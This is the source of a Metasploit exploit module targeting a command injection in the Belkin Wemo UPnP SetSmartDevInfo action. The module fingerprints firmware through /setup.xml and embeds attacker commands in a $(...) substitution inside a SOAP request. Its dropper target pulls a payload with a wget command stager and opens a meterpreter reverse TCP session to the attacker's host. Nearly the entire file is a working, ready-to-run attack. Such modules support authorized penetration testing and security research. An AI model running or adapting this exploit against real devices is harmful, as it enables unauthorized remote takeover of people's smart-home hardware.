Path: blob/master/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Belkin Wemo UPnP command injection (SetSmartDevInfo / SmartDevURL).
#
# The vulnerable request is a SOAP POST to /upnp/control/basicevent1; the
# injected string is placed, XML-escaped, inside a $(...) substitution in the
# SmartDevURL element (see #generate_soap_xml). The Linux Dropper target
# writes a staged payload under WritableDir, so ARTIFACTS_ON_DISK is declared.
# Firmware 2.00.8643 and later is reported as Safe by #check.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Belkin Wemo UPnP Remote Code Execution',
      'Description' => %q{
        This module exploits a command injection in the Belkin Wemo UPnP API via
        the SmartDevURL argument to the SetSmartDevInfo action.

        This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
        devices are known to be affected, albeit on a different RPORT (49153).
      },
      'Author' => [
        'phikshun', # Discovery, UFuzz, and modules
        'wvu', # Crock-Pot testing and module
        'nstarke' # Version-checking research and implementation
      ],
      'References' => [
        ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
        ['URL', 'https://github.com/phikshun/ufuzz'],
        ['URL', 'https://gist.github.com/phikshun/10900566'],
        ['URL', 'https://gist.github.com/phikshun/9984624'],
        ['URL', 'https://www.crock-pot.com/wemo-landing-page.html'],
        ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
        ['URL', 'http://www.wemo.com/']
      ],
      'DisclosureDate' => '2014-04-04',
      'License' => MSF_LICENSE,
      'Platform' => ['unix', 'linux'],
      'Arch' => [ARCH_CMD, ARCH_MIPSLE],
      'Privileged' => true,
      'Targets' => [
        ['Unix In-Memory',
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Type' => :unix_memory,
          'DefaultOptions' => {
            'PAYLOAD' => 'cmd/unix/generic'
          }
        ],
        ['Linux Dropper',
          'Platform' => 'linux',
          'Arch' => ARCH_MIPSLE,
          'Type' => :linux_dropper,
          'DefaultOptions' => {
            'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
          }
        ]
      ],
      'DefaultTarget' => 1,
      'Notes' => {
        'NOCVE' => ['Patched in 2.00.8643 without vendor disclosure'],
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [ARTIFACTS_ON_DISK],
        'Reliability' => [REPEATABLE_SESSION]
      }
    ))

    register_options([
      Opt::RPORT(49152)
    ])

    register_advanced_options([
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
    ])
  end

  # Fingerprints the device from GET /setup.xml.
  #
  # Result ladder: Unknown when the response is not a 200 whose body contains
  # 'urn:Belkin:device:'; Detected when the firmwareVersion element is absent
  # or not of the form WeMo_WW_<dotted number>; Appears when that version is
  # below 2.00.8643; Safe otherwise.
  #
  # @return [CheckCode]
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/setup.xml'
    )

    wemo = res && res.code == 200 && res.body.include?('urn:Belkin:device:')
    unless wemo
      vprint_error('Wemo-enabled device not detected')
      return CheckCode::Unknown
    end

    vprint_good('Wemo-enabled device detected')

    version = firmware_version_from(res)
    unless version
      vprint_error('Could not determine firmware version')
      return CheckCode::Detected
    end

    vprint_status("Found firmware version: #{version}")

    # https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
    if version < Rex::Version.new('2.00.8643')
      vprint_good("Firmware version #{version} < 2.00.8643")
      CheckCode::Appears
    else
      vprint_error("Firmware version #{version} >= 2.00.8643")
      CheckCode::Safe
    end
  end

  # Dispatches on the selected target type.
  #
  # :unix_memory sends the encoded payload as-is; :linux_dropper sends the
  # regenerated wget-based command stager built by #dropper_command_line.
  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_command(dropper_command_line)
    end
  end

  # Issues the vulnerable SOAP request with +cmd+ embedded in SmartDevURL.
  #
  # This is the CmdStager callback; +opts+ is accepted for interface
  # compatibility and not used. The request is a POST to
  # /upnp/control/basicevent1 with a SetSmartDevInfo SOAPACTION header and
  # a text/xml body from #generate_soap_xml.
  #
  # @param cmd [String] command to embed
  # @param opts [Hash] unused
  # @return [Rex::Proto::Http::Response, nil] whatever send_request_cgi returns
  def execute_command(cmd, opts = {})
    headers = {
      'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
    }

    send_request_cgi(
      'method' => 'POST',
      'uri' => '/upnp/control/basicevent1',
      'ctype' => 'text/xml',
      'headers' => headers,
      'data' => generate_soap_xml(cmd)
    )
  end

  # Builds the SetSmartDevInfo SOAP envelope.
  #
  # +cmd+ is XML-text-escaped before interpolation so the envelope stays
  # well-formed; the $(...) wrapper is what the device-side handler expands.
  #
  # @param cmd [String]
  # @return [String] SOAP XML body
  def generate_soap_xml(cmd)
    <<~EOF
      <?xml version="1.0" encoding="utf-8"?>
      <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <s:Body>
          <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
            <SmartDevURL>$(#{cmd.encode(xml: :text)})</SmartDevURL>
          </u:SetSmartDevInfo>
        </s:Body>
      </s:Envelope>
    EOF
  end

  # Memoized on-disk path for the dropped stager: WritableDir plus a random
  # alphanumeric name of 8..42 characters. Memoized so every stager command
  # refers to the same file.
  #
  # @return [String]
  def cmdstager_path
    @cmdstager_path ||= "#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
  end

  private

  # Extracts the firmware version from the /setup.xml response.
  #
  # @param res [Rex::Proto::Http::Response]
  # @return [Rex::Version, nil] nil when no firmwareVersion element exists or
  #   its text does not match WeMo_WW_<dotted number>
  def firmware_version_from(res)
    text = res.get_xml_document.at('firmwareVersion')&.text
    return unless text

    match = text.match(/WeMo_WW_(?<ver>\d+(?:\.\d+)+)/)
    match && Rex::Version.new(match[:ver])
  end

  # Assembles the :linux_dropper command line.
  #
  # The wget stager is generated with noconcat so individual commands can be
  # edited: the 'chmod +x' step is dropped and replaced by copying /bin/sh to
  # cmdstager_path first (the original "HACK" for chmod +x), then the commands
  # are joined with ';'.
  #
  # @return [String]
  def dropper_command_line
    cmds = generate_cmdstager(
      flavor: :wget,
      temp: datastore['WritableDir'],
      file: File.basename(cmdstager_path),
      noconcat: true
    )

    # HACK: "chmod +x"
    without_chmod = cmds.reject { |cmd| cmd.start_with?('chmod +x') }
    line = ["cp /bin/sh #{cmdstager_path}", *without_chmod].join(';')

    vprint_status("Regenerated command stager: #{line}")
    line
  end

end